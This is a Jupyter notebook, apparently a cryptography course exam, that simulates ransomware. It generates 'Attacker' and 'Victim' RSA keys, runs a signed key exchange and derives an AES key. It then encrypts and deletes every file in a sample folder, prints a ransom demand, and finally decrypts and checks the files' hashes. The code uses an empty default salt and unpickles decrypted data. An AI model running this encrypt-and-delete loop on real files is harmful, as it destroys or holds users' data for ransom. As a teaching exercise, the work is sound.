Parcial Final Criptografia

In [1]:
%pip install pycryptodome
%pip install cryptography

Note: you may need to restart the kernel to use updated packages.
Note: you may need to restart the kernel to use updated packages.


In [5]:
from Crypto.PublicKey import RSA
from Crypto.Cipher import PKCS1_OAEP, AES
from Crypto.Hash import SHA256
from Crypto.Signature import pkcs1_15
from Crypto.Util.Padding import pad, unpad
from Crypto.Random import get_random_bytes
from cryptography.hazmat.primitives.kdf.pbkdf2 import PBKDF2HMAC
from cryptography.hazmat.backends import default_backend
from cryptography.hazmat.primitives import hashes
from cryptography.hazmat.primitives.kdf.scrypt import Scrypt
import os
import pickle
import hashlib

In [6]:
def generate_rsa_keys():
    return RSA.generate(2048)

def create_certificate(key, identifier):
    public_key = key.publickey().export_key()
    return {'id': identifier, 'pk': public_key}

def sign_data(private_key, data):
    h = SHA256.new(data)
    signature = pkcs1_15.new(private_key).sign(h)
    return signature

def verify_signature(public_key, data, signature):
    h = SHA256.new(data)
    try:
        pkcs1_15.new(public_key).verify(h, signature)
        return True
    except (ValueError, TypeError):
        return False

def encrypt_rsa(public_key, data):
    cipher = PKCS1_OAEP.new(public_key)
    return cipher.encrypt(data)

def decrypt_rsa(private_key, encrypted_data):
    cipher = PKCS1_OAEP.new(private_key)
    return cipher.decrypt(encrypted_data)

def generate_random_bytes():
    return get_random_bytes(1024)

def generate_aes_key_from_password(password: bytes, salt: bytes = None) -> bytes:
    if salt is None:
          salt = b''  # Utiliza un salt vacío si no se proporciona uno
    # Parámetros de PBKDF2
    kdf = PBKDF2HMAC(
        algorithm=hashes.SHA256(),
        length=32,  # Genera una llave AES de 256 bits
        salt=salt,
        iterations=100000,
        backend=default_backend()
    )
    key = kdf.derive(password)
    return key

def encrypt_file(file_path, aes_key):
    block_size = AES.block_size
    with open(file_path, 'rb') as file:
        file_data = file.read()
    cipher = AES.new(aes_key, AES.MODE_CBC)
    ciphered_data = cipher.encrypt(pad(file_data, block_size))
    iv = cipher.iv
    enc_file_path = file_path + '.enc'
    with open(enc_file_path, 'wb') as enc_file:
        enc_file.write(iv + ciphered_data)  # Save IV and ciphered data together
    os.remove(file_path)
    return enc_file_path


def decrypt_file(encrypted_file_path, aes_key):
    with open(encrypted_file_path, 'rb') as enc_file:
        file_content = enc_file.read()

    iv = file_content[:AES.block_size]
    ciphered_data = file_content[AES.block_size:]

    cipher = AES.new(aes_key, AES.MODE_CBC, iv)
    plaintext = unpad(cipher.decrypt(ciphered_data), AES.block_size)

    orig_file_path = encrypted_file_path.replace('.enc', '')
    with open(orig_file_path, 'wb') as dec_file:
        dec_file.write(plaintext)
    os.remove(encrypted_file_path)
    return orig_file_path

def calculate_file_hash(file_path):
    hash_sha256 = hashlib.sha256()
    with open(file_path, 'rb') as file:
        for chunk in iter(lambda: file.read(4096), b""):
            hash_sha256.update(chunk)
    return hash_sha256.hexdigest()

In [7]:
# Paso 1: Generar llaves RSA y crear certificados
attacker_key = generate_rsa_keys()
victim_key = generate_rsa_keys()
attacker_cert = create_certificate(attacker_key, "Attacker")
victim_cert = create_certificate(victim_key, "Victim")

In [8]:
# Paso 2: Intercambiar y verificar llaves
llaves_corto_plazo = generate_rsa_keys()
pk = llaves_corto_plazo.public_key().export_key()

#PARTE DE P
sigma1 = sign_data(victim_key, pk)

#PARTE DE Q
idP = victim_cert['id']
pkP = victim_cert['pk']
if (verify_signature(RSA.import_key(pkP),pk,sigma1)):
  k = os.urandom(128)
  dupla = pickle.dumps((k, attacker_cert['id']))
  c = encrypt_rsa(RSA.import_key(pk),dupla)
  tupla = pickle.dumps((pk,c,idP))
  sigma2 = sign_data(attacker_key, tupla)

#PARTE DE P
idQ = attacker_cert['id']
pkQ = attacker_cert['pk']
if (verify_signature(RSA.import_key(pkQ),tupla,sigma2)):
  mp = decrypt_rsa(RSA.import_key(llaves_corto_plazo.export_key()),c)
  try:
      # Intenta deserializar los datos
      deserialized_data = pickle.loads(mp)
  except pickle.UnpicklingError as e:
      print("Error al deserializar los datos:", e)

In [1]:
!ls

Parcial.ipynb  README.md  sample_data


In [11]:
# Paso 3: Generar llave AES y cifrar archivos
aes_key = generate_aes_key_from_password(k)
sample_data_dir = './sample_data'
files = os.listdir(sample_data_dir)

file_hashes = {}
for file_name in files:
    file_path = os.path.join(sample_data_dir, file_name)
    file_hashes[file_name] = calculate_file_hash(file_path)
    enc_file_path = encrypt_file(file_path, aes_key)
    print(f"Archivo {file_name} cifrado como {enc_file_path}.")

hashes_file_path = os.path.join(sample_data_dir, 'file_hashes.pkl')
with open(hashes_file_path, 'wb') as hash_file:
    pickle.dump(file_hashes, hash_file)
# Paso 4: Notificar a las victimas.
print("Todos sus archivos se han cifrado. Envien dinero a direccion colombiana 123 o si no no la recuperara.")


Archivo hola.txt cifrado como ./sample_data/hola.txt.enc.
Todos sus archivos se han cifrado. Envien dinero a direccion colombiana 123 o si no no la recuperara.


In [12]:
#Paso 5

# Cargar los hashes originales desde el archivo
hashes_file_path = os.path.join(sample_data_dir, 'file_hashes.pkl')
with open(hashes_file_path, 'rb') as hash_file:
    file_hashes = pickle.load(hash_file)


for enc_file_name in files:
    encrypted_file_path = os.path.join(sample_data_dir, enc_file_name + '.enc')
    orig_file_path = decrypt_file(encrypted_file_path, aes_key)

    # Calcular el hash del archivo descifrado
    recalculated_hash = calculate_file_hash(orig_file_path)

    # Obtener el hash original
    original_hash = file_hashes.get(enc_file_name)

    # Verificar la integridad del archivo
    if recalculated_hash == original_hash:
        print(f"Archivo {orig_file_path} descifrado e íntegro.")
    else:
        print(f"Archivo {orig_file_path} descifrado pero no íntegro.")

# Eliminar el archivo de hashes después de la verificación
os.remove(hashes_file_path)

Archivo ./sample_data/hola.txt descifrado e íntegro.
